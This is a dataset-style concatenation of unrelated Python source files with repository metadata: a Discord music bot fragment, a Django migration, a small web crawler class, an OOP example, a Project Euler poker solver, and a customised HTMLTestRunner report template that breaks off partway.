f.write(str(url) + '\n')
print(str(url) + '\n')
f.close()
bot.last_ctx = ctx
add_task = False
# async with ctx.typing():
if bot.vc == "0":
print("бот не был подключен, подключаюсь")
await join(ctx)
bot.queue_size += 1
bot.queue.append(url)
print("+ in q " + str(url))
#await queue_async.put(url)
add_task = True
if bot.vc.is_playing():
await ctx.send("Добавляю в очередь ") # url
print("Добавляю в очередь " + str(url))
bot.queue.append(url)
bot.queue_size += 1
await queue_async.put(url)
else:
print("Воспроизведение " + str(url))
player = await YTDLSource.from_url(url, loop=bot.loop) #, stream=True
bot.curr_track = url
bot.vc.play(player, after=lambda e: print('Player error: %s' % e) if e else None)
# await ctx.send("Поток пошел")
print("Поток пошел")
if add_task:
await setup()
#ctx.bot.loop.create_task(player_loop(ctx))
@bot.command(pass_context=True)
async def test(ctx):
bot.last_ctx = ctx
print("start")
bot.add_cog(MyCog(bot))
print("end")
@bot.command(pass_context=True)
async def pause(ctx): # создаем асинхронную фунцию бота
bot.last_ctx = ctx
bot.vc.pause()
await ctx.send("Ожидаю")
@bot.command(pass_context=True)
async def stop(ctx): # создаем асинхронную фунцию бота
bot.last_ctx = ctx
bot.vc.stop()
print("stop")
#await ctx.send("Стоп машина")
@bot.command(pass_context=True)
async def resume(ctx): # создаем асинхронную фунцию бота
bot.last_ctx = ctx
bot.vc.resume()
await ctx.send("Продолжаем")
def count_lines(filename, chunk_size=1<<13):
with open(filename) as file:
return sum(chunk.count('\n')
for chunk in iter(lambda: file.read(chunk_size), ''))
@bot.command(pass_context=True)
async def format_music_base(ctx):
nlines=count_lines("music_base.txt")
dnlines=nlines
input = open('music_base.txt', 'r')
source = open('music_base_tmp.txt', 'w')
data=[]
for line in input:
if line not in data:
data.append(line)
source.write(line)
else:
dnlines -= 1
if nlines == dnlines:
await ctx.send("В базе нет одинаковых треков")
else:
input.close()
source.close()
source = open('music_base_tmp.txt', 'r')
output = open('music_base.txt', 'w')
for line in source:
output.write(line)
source.close()
output.close()
print("format music base", nlines, dnlines)
await ctx.send("music_base from " + str(nlines) + " to " + str(dnlines))
bot.run(TOKEN) | [
"kravtandr@gmail.com"
] | kravtandr@gmail.com |
08a37d90b3f059b2aa1dbe702641ec21a7948d61 | 2347114af7c59bf1e9fb08d94b95b8ba7332b857 | /tagz/cart/migrations/0008_remove_cart_tax_total.py | 3ee06e9840feb308f73e4a65247b0dc82b7e7ec7 | [] | no_license | NjamiGeorge/taggz | ae654cc8478b7b63deec040e9adc33a2afc6199c | c1878d2bd41971556818d4cd9f35da71d935e185 | refs/heads/master | 2022-11-25T14:45:11.955945 | 2017-10-31T03:01:31 | 2017-10-31T03:01:31 | 108,722,476 | 0 | 1 | null | 2022-11-24T05:31:27 | 2017-10-29T09:53:27 | PHP | UTF-8 | Python | false | false | 389 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-07-17 06:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cart', '0007_auto_20170715_0050'),
]
operations = [
migrations.RemoveField(
model_name='cart',
name='tax_total',
),
]
| [
"njamygeorge9@gmail.com"
] | njamygeorge9@gmail.com |
97d77bcca3c8bc2b45e3bfc2dd41990203cc308e | 765b2891670fbf0c72c7bdc71a0aa9957ed6882d | /includes/Crawler.py | 4eb408d2874f5dc1f88c671012ffa5f954f6f12c | [
"Unlicense"
] | permissive | koteq/hlstats_inviter | 586ad639cb90deb901dfb6c13990cd6f9d5c470c | c00253b285c8ab2810b830d780e011c0ed03cf9c | refs/heads/master | 2021-01-11T15:27:26.489588 | 2017-03-21T20:46:16 | 2017-03-21T20:46:16 | 80,348,608 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py | import logging
import urllib
import urllib2
import cookielib
logger = logging.getLogger()
class Crawler(object):
"""
Crawls the web while keeping cookies in a temporary jar.
"""
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
def __init__(self):
self.cookie_jar = cookielib.LWPCookieJar()
cookie_handler = urllib2.HTTPCookieProcessor(self.cookie_jar)
self.opener = urllib2.build_opener(cookie_handler)
def request(self, url, data=None, headers=None):
headers = headers or {}
headers['User-Agent'] = self.user_agent
if data is not None:
data = urllib.urlencode(data)
headers['Content-type'] = 'application/x-www-form-urlencoded'
self.opener.addheaders = headers.items()
logger.debug('Requesting %s', url)
response = self.opener.open(url, data)
return response
def ajax(self, url, data=None, headers=None):
headers = headers or {}
headers['X-Requested-With'] = 'XMLHttpRequest'
return self.request(url, data, headers)
| [
"rereflex@gmail.com"
] | rereflex@gmail.com |
99b2cbedd4464c5e7d62fdf126c0a95f084e93d5 | cb703e45cf56ec816eb9203f171c0636aff0b99c | /Dzien01/08-oop-props-static.py | f4e5aa6ff530e529ea2d973776f3e0a6924fe599 | [] | no_license | marianwitkowskialx/Enzode | dc49f09f086e4ca128cd189852331d3c9b0e14fb | 67d8fd71838d53962b4e58f73b92cb3b71478663 | refs/heads/main | 2023-06-04T20:58:17.486273 | 2021-06-24T16:37:53 | 2021-06-24T16:37:53 | 366,424,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | from datetime import date
# OOP - metody statyczne, classmethods, properties
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def __str__(self):
return f"name={self.name}, age={self.age}"
@staticmethod
def is_adult(age):
return age>=18
@classmethod
def create_from_year(cls, name, yob):
age = date.today().year - yob
return cls(name, age)
def get_age(self):
return self.age
def set_age(self, age):
self.age = age
def del_age(self):
del(self.age)
AGE = property(get_age, set_age, del_age)
person1 = Person("Jan", 33)
print(person1)
print(Person.is_adult(18))
person2 = Person.create_from_year("Bob", 1980)
print(person2)
print(person2.AGE)
person2.AGE = 44
print(person2.AGE)
del(person2.AGE)
print(dir(person2))
| [
"noreply@github.com"
] | marianwitkowskialx.noreply@github.com |
9172f47544a3ec96a3b22276472d050776365b40 | 8df5df20ac10a8dc81f7ac6e21e835553a8f5e2d | /src/sleekapps/threads/signals/thread/thread.py | 62045b0ba77e61bb8a378d1da88a8b31a5019dbe | [] | no_license | adepeter/sleekforum | 7be71907d26623c43cd78a6da77a2398c1c25e26 | 35385e648974cdf009732af4c50b69a1825f7fda | refs/heads/master | 2022-09-18T02:45:42.522128 | 2021-10-23T06:41:44 | 2021-10-23T06:41:44 | 208,669,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | from django.core.cache import cache
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from .models import Thread, ThreadView
# from ..miscs.models.activity import Action
# from ..miscs.signals.activity import activity_updater
# #
# # @receiver(post_save, sender=Action)
# # def like_and_dislike_handler(sender, instance, created, **kwargs):
# # from django.contrib.contenttypes.models import ContentType
# # ct = ContentType.objects.get_for_model(instance).get_object_for_this_type()
# # if created:
# # get_ct_for_obj_of_instance = instance.content_object
# # if instance.action_value == Action.LIKE:
# # get_ct_for_obj_of_instance.likes = ct
# # print('Ading likes counter')
# # else:
# # print('Adding dislike counter')
# # get_ct_for_obj_of_instance.dislikes = ct
# # get_ct_for_obj_of_instance.save()
# #
# #
# # # @receiver(activity_updater)
# # # def hal(sender, **kwargs):
# # # print('Sender is', sender, kwargs.get('obj'))
| [
"adepeter26@gmail.com"
] | adepeter26@gmail.com |
04ffcc70351df93f444c5dd0ab2d2ac5febc079c | 4df72b739a9ffb720091b40fda1571781f1225ef | /Python/p054.py | 5e1b3d10cd61cc7ac9cc6ddf425d935f8b7f6f81 | [] | no_license | kentfrazier/euler | e48f49170ecc5def51ec6dcfc73b01c51ba5ec7a | 21e82060128026287a84f6d455f247df6910a099 | refs/heads/master | 2021-01-10T08:19:55.219330 | 2013-03-20T05:15:22 | 2013-03-20T05:15:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,311 | py | # In the card game poker, a hand consists of five cards and are ranked
# , from lowest to highest, in the following way:
#
# * High Card: Highest value card.
# * One Pair: Two cards of the same value.
# * Two Pairs: Two different pairs.
# * Three of a Kind: Three cards of the same value.
# * Straight: All cards are consecutive values.
# * Flush: All cards of the same suit.
# * Full House: Three of a kind and a pair.
# * Four of a Kind: Four cards of the same value.
# * Straight Flush: All cards are consecutive values of same suit.
# * Royal Flush: Ten, Jack, Queen, King, Ace, in same suit.
#
# The cards are valued in the order:
# 2, 3, 4, 5, 6, 7, 8, 9, 10, Jack, Queen, King, Ace.
#
# If two players have the same ranked hands then the rank made up of
# the highest value wins; for example, a pair of eights beats a pair
# of fives (see example 1 below). But if two ranks tie, for example,
# both players have a pair of queens, then highest cards in each hand
# are compared (see example 4 below); if the highest cards tie then
# the next highest cards are compared, and so on.
#
# Consider the following five hands dealt to two players:
#
# The file, poker.txt, contains one-thousand random hands dealt to
# two players. Each line of the file contains ten cards (separated by
# a single space): the first five are Player 1's cards and the last
# five are Player 2's cards. You can assume that all hands are valid
# (no invalid characters or repeated cards), each player's hand is in
# no specific order, and in each hand there is a clear winner.
#
# How many hands does Player 1 win?
from copy import copy
HEARTS = 0
SPADES = 1
CLUBS = 2
DIAMONDS = 3
TWO = 0
THREE = 1
FOUR = 2
FIVE = 3
SIX = 4
SEVEN = 5
EIGHT = 6
NINE = 7
TEN = 8
JACK = 9
QUEEN = 10
KING = 11
ACE = 12
HIGH_CARD = 0
PAIR = 1
TWO_PAIR = 2
THREE_OF_A_KIND = 3
STRAIGHT = 4
FLUSH = 5
FULL_HOUSE = 6
FOUR_OF_A_KIND = 7
STRAIGHT_FLUSH = 8
suits = {
'H': HEARTS,
'S': SPADES,
'C': CLUBS,
'D': DIAMONDS,
}
ranks = {
'2': TWO,
'3': THREE,
'4': FOUR,
'5': FIVE,
'6': SIX,
'7': SEVEN,
'8': EIGHT,
'9': NINE,
'T': TEN,
'J': JACK,
'Q': QUEEN,
'K': KING,
'A': ACE,
}
class Card(object):
def __init__(self, card_string):
self.rank = ranks[card_string[0]]
self.suit = suits[card_string[1]]
self.string = card_string
def __cmp__(self, other_card):
if self.rank < other_card.rank:
return -1
if self.rank > other_card.rank:
return 1
return 0
def __str__(self):
return self.string
class Hand(object):
def __init__(self, cards):
self.cards = sorted([Card(card) for card in cards], reverse=True)
self.hand_value = self.evaluate()
def evaluate(self):
if len(set(card.suit for card in self.cards)) == 1:
flush = True
else:
flush = False
if ( len(set( card.rank for card in self.cards ) ^ set([ACE, TWO, THREE, FOUR, FIVE])) == 0
or all( (self.cards[i].rank == (self.cards[i+1].rank + 1)) for i in range(len(self.cards)-1) ) ):
straight = True
else:
straight = False
if straight or flush:
self.active_cards = self.cards
self.remaining_cards = []
self.major_rank = None
self.minor_rank = None
if straight and flush:
return STRAIGHT_FLUSH
if flush:
return FLUSH
if straight:
return STRAIGHT
ranks = [ card.rank for card in self.cards ]
distribution = dict((rank, ranks.count(rank)) for rank in set(ranks))
four_sets = [ key for key in distribution.keys() if distribution.get(key) == 4 ]
three_sets = [ key for key in distribution.keys() if distribution.get(key) == 3 ]
pairs = [ key for key in distribution.keys() if distribution.get(key) == 2 ]
if len(four_sets) == 1:
self.major_rank = four_sets[0]
self.minor_rank = None
self.active_cards = [ card for card in self.cards if card.rank in four_sets ]
self.remaining_cards = [ card for card in self.cards if card.rank not in four_sets ]
return FOUR_OF_A_KIND
if len(three_sets) == 1:
self.major_rank = three_sets[0]
if len(pairs) == 1:
self.minor_rank = pairs[0]
self.active_cards = self.cards
self.remaining_cards = []
return FULL_HOUSE
self.minor_rank = None
self.active_cards = [ card for card in self.cards if card.rank in three_sets ]
self.remaining_cards = [ card for card in self.cards if card.rank not in three_sets ]
return THREE_OF_A_KIND
if len(pairs) == 2:
self.major_rank = max(pairs)
self.minor_rank = min(pairs)
self.active_cards = [ card for card in self.cards if card.rank in pairs ]
self.remaining_cards = [ card for card in self.cards if card.rank not in pairs]
return TWO_PAIR
if len(pairs) == 1:
self.major_rank = pairs[0]
self.minor_rank = None
self.active_cards = [ card for card in self.cards if card.rank in pairs ]
self.remaining_cards = [ card for card in self.cards if card.rank not in pairs]
return PAIR
self.active_cards = [self.cards[0]]
self.remaining_cards = self.cards[1:]
self.major_rank = self.active_cards[0].rank
self.minor_rank = None
return HIGH_CARD
def __cmp__(self, other_hand):
if self.hand_value > other_hand.hand_value:
return 1
if self.hand_value < other_hand.hand_value:
return -1
if self.major_rank > other_hand.major_rank:
return 1
if self.major_rank < other_hand.major_rank:
return -1
if self.minor_rank > other_hand.minor_rank:
return 1
if self.minor_rank < other_hand.minor_rank:
return -1
if self.active_cards > other_hand.active_cards:
return 1
if self.active_cards < other_hand.active_cards:
return -1
if self.remaining_cards > other_hand.remaining_cards:
return 1
if self.remaining_cards < other_hand.remaining_cards:
return -1
return 0
def __str__(self):
return ', '.join([str(card) for card in self.active_cards]) + ' (' + ', '.join([str(card) for card in self.remaining_cards]) + ') - ' + str(self.hand_value)
if __name__ == "__main__":
player_1_wins = 0
player_2_wins = 0
ties = 0
with open('poker.txt','r') as file:
for line in file.readlines():
cards = line.strip().split()
player_1_hand = Hand(cards[:5])
player_2_hand = Hand(cards[5:])
if player_1_hand > player_2_hand:
player_1_wins += 1
elif player_1_hand < player_2_hand:
player_2_wins += 1
else:
ties += 1
print player_1_wins
| [
"kentfrazier@gmail.com"
] | kentfrazier@gmail.com |
95f948dd12b0ea9f0e2a23ae2e78206b7df829ab | ac1dc07755a7644bd2af77de53ef26c7956f1344 | /Public/HTMLTestRunner_Rewrite.py | aa14b97aca869e2945ed32dd40eb333a3488e454 | [] | no_license | yu874721995/onesPro | 5483324cc99bcafa0847bb189cac8d24a956f4c9 | 384e83b266e61baf51c63a9b85074cd63d713bd4 | refs/heads/master | 2022-12-21T03:19:04.855909 | 2021-11-24T12:15:28 | 2021-11-24T12:15:28 | 204,904,033 | 1 | 0 | null | 2022-07-29T23:27:38 | 2019-08-28T10:15:35 | HTML | UTF-8 | Python | false | false | 42,019 | py | """
A TestRunner for use with the Python unit testing framework. It
generates a HTML report to show the result at a glance.
The simplest way to use this is to invoke its main method. E.g.
import unittest
import HTMLTestRunner
... define your tests ...
if __name__ == '__main__':
HTMLTestRunner.main()
For more customization options, instantiates a HTMLTestRunner object.
HTMLTestRunner is a counterpart to unittest's TextTestRunner. E.g.
# output to a file
fp = file('my_report.html', 'wb')
runner = HTMLTestRunner.HTMLTestRunner(
stream=fp,
title='My unit test',
description='This demonstrates the report output by HTMLTestRunner.'
)
# Use an external stylesheet.
# See the Template_mixin class for more customizable options
runner.STYLESHEET_TMPL = '<link rel="stylesheet" href="my_stylesheet.css" type="text/css">'
# run the test
runner.run(my_test_suite)
------------------------------------------------------------------------
Copyright (c) 2004-2007, Wai Yip Tung
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name Wai Yip Tung nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# URL: http://tungwaiyip.info/software/HTMLTestRunner.html
__author__ = "Wai Yip Tung"
__version__ = "0.8.2"
"""
Change History
Version 0.8.2
* Show output inline instead of popup window (Viorel Lupu).
Version in 0.8.1
* Validated XHTML (Wolfgang Borgert).
* Added description of test classes and test cases.
Version in 0.8.0
* Define Template_mixin class for customization.
* Workaround a IE 6 bug that it does not treat <script> block as CDATA.
Version in 0.7.1
* Back port to Python 2.3 (Frank Horowitz).
* Fix missing scroll bars in detail log (Podi).
"""
# TODO: color stderr
# TODO: simplify javascript using ,ore than 1 class in the class attribute?
import datetime
import io
import sys
import time
import unittest
from xml.sax import saxutils
# ------------------------------------------------------------------------
# The redirectors below are used to capture output during testing. Output
# sent to sys.stdout and sys.stderr are automatically captured. However
# in some cases sys.stdout is already cached before HTMLTestRunner is
# invoked (e.g. calling logging.basicConfig). In order to capture those
# output, use the redirectors for the cached stream.
#
# e.g.
# >>> logging.basicConfig(stream=HTMLTestRunner.stdout_redirector)
# >>>
class OutputRedirector(object):
""" Wrapper to redirect stdout or stderr """
def __init__(self, fp):
self.fp = fp
def write(self, s):
self.fp.write(s)
def writelines(self, lines):
self.fp.writelines(lines)
def flush(self):
self.fp.flush()
stdout_redirector = OutputRedirector(sys.stdout)
stderr_redirector = OutputRedirector(sys.stderr)
# ----------------------------------------------------------------------
# Template
class Template_mixin(object):
"""
Define a HTML template for report customerization and generation.
Overall structure of an HTML report
HTML
+------------------------+
|<html> |
| <head> |
| |
| STYLESHEET |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </head> |
| |
| <body> |
| |
| HEADING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| REPORT |
| +----------------+ |
| | | |
| +----------------+ |
| |
| ENDING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </body> |
|</html> |
+------------------------+
"""
STATUS = {
0: 'pass',
1: 'fail',
2: 'error',
}
DEFAULT_TITLE = 'Unit Test Report'
DEFAULT_DESCRIPTION = ''
# ------------------------------------------------------------------------
# HTML Template
HTML_TMPL = r"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta name="generator" content="%(generator)s"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
%(stylesheet)s
</head>
<body style="background-color:#C0C0C0">
<script language="javascript" type="text/javascript"><!--
output_list = Array();
/* level - 0:Summary; 1:Pass; 2:Fail; 3:Error; 4:All */
function showCase(level) {
trs = document.getElementsByTagName("tr");
for (var i = 0; i < trs.length; i++) {
tr = trs[i];
id = tr.id;
if (id.substr(0,2) == 'Ft') {
if (level == 2) {
tr.className = '';
}
else if(level == 4) {
tr.className = '';
}
else if(level == 5) {
tr.className = '';
}
else{
tr.className = 'hiddenRow';
}
}
if (id.substr(0,2) == 'Pt') {
if (level == 1) {
tr.className = '';
}
else if(level == 4 ) {
tr.className = '';
}
else{
tr.className = 'hiddenRow';
}
}
if (id.substr(0,2) == 'Et') {
if (level == 3) {
tr.className = '';
}
else if(level == 4 ) {
tr.className = '';
}
else if(level == 5 ) {
tr.className = '';
}
else{
tr.className = 'hiddenRow';
}
}
}
}
function showClassDetail(cid, count) {
var id_list = Array(count);
var toHide = 1;
for (var i = 0; i < count; i++) {
tid0 = 't' + cid.substr(1) + '.' + (i+1);
tid = 'F' + tid0;
tr = document.getElementById(tid);
if (!tr) {
tid = 'P' + tid0;
tr = document.getElementById(tid);
if(!tr){
tid = 'E' + tid0;
tr = document.getElementById(tid);
}
}
id_list[i] = tid;
if (tr.className) {
toHide = 0;
}
}
for (var i = 0; i < count; i++) {
tid = id_list[i];
if (toHide) {
document.getElementById('div_'+tid).style.display = 'none'
document.getElementById(tid).className = 'hiddenRow';
}
else {
document.getElementById(tid).className = '';
}
}
}
function showTestDetail(div_id){
var details_div = document.getElementById(div_id)
var displayState = details_div.style.display
// alert(displayState)
if (displayState != 'block' ) {
displayState = 'block'
details_div.style.display = 'block'
}
else {
details_div.style.display = 'none'
}
}
function html_escape(s) {
s = s.replace(/&/g,'&');
s = s.replace(/</g,'<');
s = s.replace(/>/g,'>');
return s;
}
/* obsoleted by detail in <div>
function showOutput(id, name) {
var w = window.open("", //url
name,
"resizable,scrollbars,status,width=800,height=450");
d = w.document;
d.write("<pre>");
d.write(html_escape(output_list[id]));
d.write("\n");
d.write("<a href='javascript:window.close()'>close</a>\n");
d.write("</pre>\n");
d.close();
}
*/
--></script>
%(heading)s
%(report)s
%(ending)s
%(chart)s
</body>
</html>
<script type="text/javascript">
function drawCircle(pass, fail, error){
var color = ["#6c6","#c60","#c00"];
var data = [pass,fail,error];
var canvas = document.getElementById("circle");
var ctx = canvas.getContext("2d");
var startPoint=0;
for(var i=0;i<data.length;i++){
ctx.fillStyle = color[i];
ctx.beginPath();
ctx.moveTo(112,84);
ctx.arc(112,84,84,startPoint,startPoint+Math.PI*2*(data[i]/(data[0]+data[1]+data[2])),false);
ctx.fill();
startPoint += Math.PI*2*(data[i]/(data[0]+data[1]+data[2]));
}
}
function FillRect(cxt, x1, y1, width, height, color) {
cxt.fillStyle = color;
cxt.fillRect(x1, y1, width, height);
}
function drawBar(pass, fail, error){
var color = ["#6c6","#c60","#c00"];
var data = [pass,fail,error];
var count = pass + fail + error;
var h =[10+(1 - pass/count)*148,10+(1 - fail/count)*148,10+(1 - error/count)*148];
var x = [30,90,150];
var y = [70,130,190];
var canvas = document.getElementById("bar");
var ctx = canvas.getContext("2d");
DrawString(ctx, 'Count(c)', '', '', '', '', 15, 10)
DrawLine(ctx,5,15,10,10,'black');
DrawLine(ctx,15,15,10,10,'black');
DrawLine(ctx,10,10,10,158,'black');
DrawLine(ctx,10,158,215,158,'black');
DrawLine(ctx,210,153,215,158,'black');
DrawLine(ctx,210,163,215,158,'black');
DrawString(ctx, 'Type(c)', '', '', '', '', 180, 160)
for(var i=0;i<3;i++) {
DrawLine(ctx,x[i],h[i],x[i],158,color[i]);
DrawLine(ctx,x[i],h[i],y[i],h[i],color[i]);
DrawLine(ctx,y[i],h[i],y[i],158,color[i]);
DrawLine(ctx,(y[i]+x[i])/2,153,(y[i]+x[i])/2,158,color[i]);
DrawString(ctx, data[i], '', color[i], '', '', (y[i]+x[i])/2, h[i]-15);
FillRect(ctx, x[i], h[i], 40, 158-h[i], color[i]);
}
}
function DrawP(ctx, P) {
with (ctx) {
moveTo(P[0],P[1]);
lineTo(P[0]+1,P[1]+1);
}
}
function DrawLine(cxt, x1, y1, x2, y2, color) {
cxt.strokeStyle = color;
cxt.beginPath();
cxt.moveTo(x1, y1);
cxt.lineTo(x2, y2);
cxt.stroke();
}
function DrawString(cxt, text, font, color, align, v_align, x, y) {
if (font == "") {
cxt.font = "10px";
}
else {
cxt.font = font;
}
if (color == "") {
cxt.fillStyle = "#000000";
}
else {
cxt.fillStyle = color;
}
if (align == "") {
cxt.textAlign = "left";
}
else {
cxt.textAlign = align;
}
if (v_align == "") {
cxt.textBaseline = "top";
}
else {
cxt.textBaseline = v_align;
}
cxt.fillText(text, x, y);
}
function drawline(pass, fail, error){
var color = ["#6c6","#c60","#c00"];
var data = [pass,fail,error];
var count = pass + fail + error;
var x = [30,90,150];
var y = [70,130,190];
var h =[10+(1 - pass/count)*148,10+(1 - fail/count)*148,10+(1 - error/count)*148];
var canvas = document.getElementById("line");
var ctx = canvas.getContext("2d");
DrawString(ctx, 'Count(c)', '', '', '', '', 15, 10)
DrawLine(ctx,5,15,10,10,'black');
DrawLine(ctx,15,15,10,10,'black');
DrawLine(ctx,10,10,10,158,'black');
DrawLine(ctx,10,158,215,158,'black');
DrawLine(ctx,210,153,215,158,'black');
DrawLine(ctx,210,163,215,158,'black');
DrawString(ctx, 'Type(c)', '', '', '', '', 180, 160)
for(var i=0;i<3;i++) {
p = Array((y[i]+x[i])/2,h[i]);
DrawP(ctx,p);
DrawLine(ctx,(y[i]+x[i])/2,153,(y[i]+x[i])/2,158,color[i]);
DrawString(ctx, data[i], '', color[i], '', '', (y[i]+x[i])/2, h[i]-15);
if(i < 2) {
DrawLine(ctx,(y[i]+x[i])/2,h[i],(y[i+1]+x[i+1])/2,h[i+1],'black');
}
}
}
</script>
"""
# variables: (title, generator, stylesheet, heading, report, ending)
# ------------------------------------------------------------------------
# Stylesheet
#
# alternatively use a <link> for external style sheet, e.g.
# <link rel="stylesheet" href="$url" type="text/css">
STYLESHEET_TMPL = """
<style type="text/css" media="screen">
body { font-family: verdana, arial, helvetica, sans-serif; font-size: 80%; }
table { font-size: 100%; }
pre { }
/* -- heading ---------------------------------------------------------------------- */
h1 {
font-size: 16pt;
color: gray;
}
.heading {
margin-top: 0ex;
margin-bottom: 1ex;
}
.heading .attribute {
margin-top: 1ex;
margin-bottom: 0;
}
.button{
border:1px solid #cccccc;
cursor:pointer;
margin:10px 5px;
height:40px;
text-align:center;
border-radius: 4px;
border-color: #636263 #464647 #A1A3A5;
text-shadow: 0 1px 1px #F6F6F6;
background-image: -moz-linear-gradient(center top, #D9D9D9, #A6A6A6 49%, #A6A6A6 50%);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #D9D9D9),color-stop(1, #A6A6A6));
}
.buttonText{
position:relative;
font-weight:bold;
top:10px;
color:#58595B;
}
.heading .description {
margin-top: 4ex;
margin-bottom: 6ex;
}
.panel .description{
border:1px solid #CCCCCC;
border-color: #636263 #464647 #A1A3A5;
margin:10px 5px;
height:165px;
border-radius: 4px;
}
.scroll-item {
position: relative;
width: 100%;
height: 32px;
border-bottom:1px solid gray;
cursor: pointer;
}
.item-even {
background-color: #E7E8EC;
}
.item-odd {
background-color: #E0ECF6;
}
.rect {
float: left;
margin-top: 5px;
margin-left: 5px;
width: 20px;
height: 20px;
border-radius: 3px;
}
.item-text{
margin-left: 5px;
height: 100%;
float: left;
font-size: 14px;
vertical-align: middle;
display: inline-block;
line-height: 30px;
}
.bg{
position:absolute;
height:97%;
width:80%;
overflow-x: hidden;
overflow-y:hidden;
}
.panel{
position:absolute;
height:550px;
width:750px;
left:45px;
top:45px;
border-radius: 12px;
background-image: -moz-linear-gradient(top,#EBEBEB, #BFBFBF);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #EBEBEB),color-stop(1, #BFBFBF));
}
.panel1{
position:absolute;
height:550px;
width:200px;
left:800px;
top:45px;
border-radius: 12px;
background-image: -moz-linear-gradient(top,#EBEBEB, #BFBFBF);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #EBEBEB),color-stop(1, #BFBFBF));
}
.panelBg{
position:absolute;
height:600px;
width:1000px;
left:20px;
top:20px;
border-radius: 12px;
background-color:#000000;
opacity:0.5;
}
.title{
border:1px solid green;
position:relative;
margin:5px;
font-size:22px;
font-weight:bold;
text-align:center;
color:#58595B;
}
.piechart{
border:1px solid green;
margin:5px;
height:170px;
}
.barchart{
border:1px solid green;
margin:5px;
height:170px;
}
.linechart{
border:1px solid green;
margin:5px;
height:170px;
}
.subTitle{
border:1px solid green;
margin:5px;
font-size:14px;
height:70px;
font-weight:bold;
text-indent:2em;
color:#6D6E71;
}
/* -- css div popup ------------------------------------------------------------------------ */
a.popup_link {
}
a.popup_link:hover {
color: red;
}
.popup_window {
display: none;
position: relative;
left: 0px;
top: 0px;
/*border: solid #627173 1px; */
padding: 10px;
background-color: #E6E6D6;
font-family: "Lucida Console", "Courier New", Courier, monospace;
text-align: left;
font-size: 8pt;
width: 500px;
}
}
/* -- report ------------------------------------------------------------------------ */
#show_detail_line {
margin-top: 3ex;
margin-bottom: 1ex;
}
#result_table {
width: 80%;
border-collapse: collapse;
border: 1px solid #777;
}
#header_row {
font-weight: bold;
color: white;
background-color: #777;
}
#result_table td {
border: 2px solid #777;
padding: 3px;
}
#total_row { font-weight: bold; }
.passClass { background-color: #6c6; }
.failClass { background-color: #c60; }
.errorClass { background-color: #c00; }
.passCase { color: #58595B; font-weight: bold;}
.failCase { color: #c60; font-weight: bold; }
.errorCase { color: #c00; font-weight: bold; }
.hiddenRow { display: none; }
.testcase { margin-left: 2em; }
#section1{
border:1px solid green;
position:relative;
float:left;
width:235px;
height:530px;
top:10px;
left:10px;
}
#section2{
border:1px solid green;
position:relative;
float:left;
width:235px;
height:530px;
top:10px;
left:20px;
}
#section3{
border:1px solid green;
position:relative;
float:left;
width:235px;
height:530px;
top:10px;
left:30px;
}
#section4{
border:1px solid green;
position:relative;
float:left;
width:180px;
height:530px;
top:10px;
left:10px;
}
.loseeffect{
color:black;
text-decoration:none;
cursor:text;
}
/* -- ending ---------------------------------------------------------------------- */
#ending {
}
</style>
"""
# ------------------------------------------------------------------------
# Heading
#
HEADING_TMPL = """<div class='heading'>
<h1>%(title)s</h1>
%(parameters)s
<p class='description'>%(description)s</p>
</div>
""" # variables: (title, parameters, description)
HEADING_ATTRIBUTE_TMPL = """<p class='attribute'><strong>%(name)s:</strong> %(value)s</p>
""" # variables: (name, value)
# ------------------------------------------------------------------------
# Report
#
REPORT_TMPL = """
<p id='show_detail_line'>Show
<a href='javascript:showCase(0)'>Summary</a>
<a href='javascript:showCase(1)'>Pass</a>
<a href='javascript:showCase(2)'>Fail</a>
<a href='javascript:showCase(3)'>Error</a>
<a href='javascript:showCase(5)'>Fail&Error</a>
<a href='javascript:showCase(4)'>All</a>
</p>
<table id='result_table'>
<colgroup>
<col align='left' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
</colgroup>
<tr id='header_row'>
